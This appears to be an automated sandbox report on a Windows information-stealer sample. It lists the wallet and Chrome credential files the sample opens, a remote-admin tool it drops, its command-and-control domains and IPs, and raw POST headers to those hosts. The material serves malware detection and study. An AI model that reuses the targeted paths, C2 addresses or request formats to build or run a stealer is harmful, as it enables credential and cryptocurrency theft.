Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Electrum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: l4C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \com.liberty.jaxx
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: l8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 1wOdXavtlE.exe	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected RMS RemoteAdmin tool

Source: Yara match	File source: 00000025.00000002.570035288.00000000015DA000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.537867326.00000000015DA000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Immunity\is-4BBH3.tmp, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.216.141.204	s3-1-w.amazonaws.com	United States	16509	AMAZON-02US	false
195.54.160.9	unknown	unknown	49505	SELECTELRU	false
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
86.107.197.8	unknown	Romania	39855	MOD-EUNL	true
88.99.66.31	iplogger.org	Germany	24940	HETZNER-ASDE	false
79.141.170.43	pokacienon.xyz	Bulgaria	61046	HZ-UK-ASGB	true
52.216.179.59	unknown	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name	IP	Active
bitbucket.org	104.192.141.1	true
s3-1-w.amazonaws.com	52.216.141.204	true
pokacienon.xyz	79.141.170.43	true
zen.hldns.ru	194.169.163.42	true
iplogger.org	88.99.66.31	true
bbuseruploads.s3.amazonaws.com	unknown	unknown
api.ip.sb	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://86.107.197.8:38214/	true	Avira URL Cloud: safe	unknown
http://pokacienon.xyz/	false	Avira URL Cloud: safe	unknown

AV Detection:

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\is-PFD3D.tmp	ReversingLabs: Detection: 55%
Source: C:\ProgramData\is-R3F67.tmp	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\servs.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Metadefender: Detection: 18%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: 1wOdXavtlE.exe	Metadefender: Detection: 16%			Perma Link
Source: 1wOdXavtlE.exe	ReversingLabs: Detection: 58%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ssevs.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 1wOdXavtlE.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: 1wOdXavtlE.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: C:\ProgramData\Immunity\rutserv.exe

File created: C:\ProgramData\Remote Manipulator System\install.log

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.141.204:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.179.59:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49733 version: TLS 1.2

Source: 1wOdXavtlE.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: PasswordOnWakeSettingFlyout.pdb source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp
Source:	Binary string: PasswordOnWakeSettingFlyout.pdbGCTL source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040B268 FindFirstFileW,FindClose,	17_2_0040B268
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040AC9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	17_2_0040AC9C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005E9B24 FindFirstFileW,GetLastError,	19_2_005E9B24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040CBFC FindFirstFileW,FindClose,	19_2_0040CBFC
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040C630 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	19_2_0040C630
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_00641778 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,	19_2_00641778

Networking:

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 86.107.197.8 ports 1,2,3,4,8,38214

Performs DNS queries to domains with low reputation

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.6:49761 -> 86.107.197.8:38214
Source: global traffic	TCP traffic: 192.168.2.6:49763 -> 195.54.160.9:32972

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: pokacienon.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: pokacienon.xyzContent-Length: 1137076Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: pokacienon.xyzContent-Length: 1137062Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 86.107.197.8:38214Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 195.54.160.9:32972Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: 86.107.197.8:38214Content-Length: 856112Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 86.107.197.8:38214Content-Length: 856098Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: 195.54.160.9:32972Content-Length: 23182Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 195.54.160.9:32972Content-Length: 23168Expect: 100-continueAccept-Encoding: gzip, deflate

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.192.141.1 104.192.141.1

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8

Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: svchost.exe, 0000000F.00000002.465315065.00000221A3B13000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-01T08:42:55.8407457Z\|\|.\|\|646da06c-a69a-4aff-bcc8-3f5a349348ca\|\|1152921505693336001\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000F.00000002.465315065.00000221A3B13000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-01T08:42:55.8407457Z\|\|.\|\|646da06c-a69a-4aff-bcc8-3f5a349348ca\|\|1152921505693336001\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000F.00000003.450300636.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JEc equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.450300636.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JEc equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000F.00000003.442264061.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com 